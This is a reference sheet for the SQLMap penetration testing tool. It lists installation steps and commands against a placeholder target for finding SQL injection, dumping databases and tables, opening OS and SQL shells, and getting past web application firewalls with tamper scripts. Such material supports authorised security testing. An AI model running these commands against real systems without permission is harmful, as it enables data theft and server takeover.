Description
SQLMap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches.
Installation
BASH
# Using pip
pip install sqlmap
# From source
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python sqlmap.py --versionBasic Usage
BASH
# Test a URL parameter
sqlmap -u "https://target.com/?id=1"
# POST request
sqlmap -u "https://target.com/login" --data "user=admin&pass=test"
# From saved request file
sqlmap -r request.txtAdvanced Usage
BASH
# Enumerate databases
sqlmap -u "https://target.com/?id=1" --dbs
# Enumerate tables
sqlmap -u "https://target.com/?id=1" -D database --tables
# Dump table data
sqlmap -u "https://target.com/?id=1" -D database -T table --dump
# OS shell
sqlmap -u "https://target.com/?id=1" --os-shell
# SQL shell
sqlmap -u "https://target.com/?id=1" --sql-shell
# Tamper scripts (WAF bypass)
sqlmap -u "https://target.com/?id=1" --tamper=space2comment,randomcase
# Risk and level (max testing)
sqlmap -u "https://target.com/?id=1" --risk=3 --level=5
# Batch mode (non-interactive)
sqlmap -u "https://target.com/?id=1" --batch
# Specific technique
sqlmap -u "https://target.com/?id=1" --technique=BEU
# Custom injection point
sqlmap -u "https://target.com/?id=1*" --batch
# Through proxy
sqlmap -u "https://target.com/?id=1" --proxy http://127.0.0.1:8080
# With cookies
sqlmap -u "https://target.com/?id=1" --cookie "session=abc123"Common Workflows
BASH
# Full automatic exploitation
sqlmap -u "https://target.com/?id=1" --batch --dbs --dump-all
# Test with WAF bypass
sqlmap -u "https://target.com/?id=1" --tamper=space2comment --random-agent --batch
# From Burp request
sqlmap -r burp-request.txt --batch --level 3 --risk 2